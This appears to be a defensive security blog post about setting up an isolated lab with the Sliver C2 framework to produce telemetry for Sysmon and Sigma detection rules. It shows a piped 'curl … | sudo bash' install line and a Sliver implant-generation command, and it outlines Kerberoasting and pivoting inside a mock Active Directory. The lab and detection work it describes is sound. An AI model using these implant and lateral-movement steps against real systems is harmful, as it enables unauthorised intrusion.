Building C2 Infra with Sliver in an Isolated Lab for Defensive Research

Every time a SOC analyst opens a ticket for 'suspicious beacon', there is a real chance nobody on the team has ever watched a C2 in action with their own eyes. Red Team operators run Sliver, Mythic and Havoc every day, but most defenders only know those frameworks from Mandiant report screenshots. Basilisk OffSec built an isolated VLAN lab with no internet egress specifically to close that gap. The goal is not to attack anything external: it is to generate realistic telemetry so the Blue Team can train detection rules on indicators they generated, controlled and documented themselves. Without that, threat hunting becomes educated guessing.

Sliver is written in Go, maintained by BishopFox, and ships implants for Windows, Linux and macOS over mTLS, WireGuard, HTTP(S) and DNS. Compared to Cobalt Strike it is free, open source and auditable; compared to Mythic it needs less infrastructure for a small lab. Our setup uses a Debian 12 VM as teamserver with 4 vCPU and 8 GB RAM, behind a pfSense that only allows traffic between the C2 VLAN (10.50.10.0/24) and the victim VLAN (10.50.20.0/24). Zero NAT outbound. If you have not built a base lab yet, the path covered in Web Pentesting From Scratch: Building a Safe Lab with DVWA, Juice Shop and Burp Suite is a solid foundation before going further.

Teamserver install is straightforward: 'curl https://sliver.sh/install | sudo bash' works, but in an isolated environment we download the signed binary, verify it with cosign and copy it via a dedicated USB stick. We generate implant profiles with 'generate --mtls 10.50.10.5:8443 --os windows --arch amd64 --skip-symbols --save ./payloads'. The --skip-symbols flag shrinks the binary by 40% and slows down quick reverse engineering, while leaving enough for debugging. On a Windows 11 21H2 lab with Defender real time on, the unobfuscated implant dies in 12 seconds: that is exactly what we want to measure. To understand the delivery chain that precedes the beacon, check Simulated Initial Access: Macros, LNK and ISO in an Isolated Windows 11 Lab.

The educational payoff starts after the beacon checks in. Every operator command (whoami, getsystem, execute-assembly, sideload) produces a process pattern, API call and network footprint that the defensive team needs to recognize. We run Sysmon with the SwiftOnSecurity config, Elastic Agent shipping to a local cluster, and correlate the events with Sigma rules. Across 3 sprints we mapped 47 new detections, from Sliver default named pipes to rundll32 spawns with no command line. That whole pipeline of turning an IOC into a rule is documented in Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule and pairs naturally with what we cover here.

Lateral movement inside the lab is where things get spicy. We spin up a mini-AD with 2 DCs, 4 workstations and a file server, mirroring a mid-size customer topology. With the initial Sliver implant on a low-privilege host, we use rubeus for Kerberoasting, then pivot via WireGuard to reach the DC without ever touching it directly from the teamserver. The techniques in Active Directory Pentest: Step-by-Step Kerberoasting in a GOAD Lab and Pivoting with Chisel and Ligolo-ng: Segmented Networks in a Pentest Lab are basically the same logic applied with different tooling. The point: every hop leaves traces - 4624 type 3, 4769 with weak encryption, anomalous WMI connections - and all of that becomes hunting training material.

Lab OPSEC matters more than people assume. Even air-gapped, snapshots containing live implants have leaked to public repos when someone uploaded them by accident. Our rule: lab VMs live on a LUKS-encrypted datastore, snapshots never leave the host, and any artifact that needs to exit (Sigma rule, IOC, video) goes through manual review. This connects to the approach in OPSEC for Security Researchers: Building a Personal Threat Model and Metadata Hygiene: Stripping EXIF, PDF and Office Before You Publish - the classic mistake is publishing a report PDF whose metadata hands over username, hostname and even the file path on the researcher's personal laptop.

Practical takeaway: if you defend a company and have never watched a Sliver beacon on a screen you control, your detection is theoretical. Block out a full Friday, assemble the lab with pfSense + Debian + 2 Windows, generate an unobfuscated implant, let it run commands for 30 minutes and open Sysmon. You will walk away with more hunting material than three paid courses combined - and zero legal risk, because everything happens inside the 10.50.0.0/16 VLAN that talks to nobody outside.